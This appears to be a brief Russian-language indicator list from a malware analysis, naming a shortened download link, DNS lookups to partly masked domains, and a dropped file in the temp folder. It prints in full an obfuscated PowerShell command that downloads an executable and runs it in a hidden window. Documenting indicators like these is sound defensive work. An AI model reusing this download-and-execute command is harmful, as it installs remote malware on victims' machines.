Техническая информация
- http://bi#.ly/2x3ufjb как %temp%\987654.exe
- http://bi#.ly/2X3ufJB
- DNS ASK bi#.ly
- DNS ASK s.##t.re
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bi#.ly/2X3ufJB ” , ”$ENv:teMp\987654.exe” ) ; stARt ”$ENv:tEMP\987654.exe”' (со скрытым окном)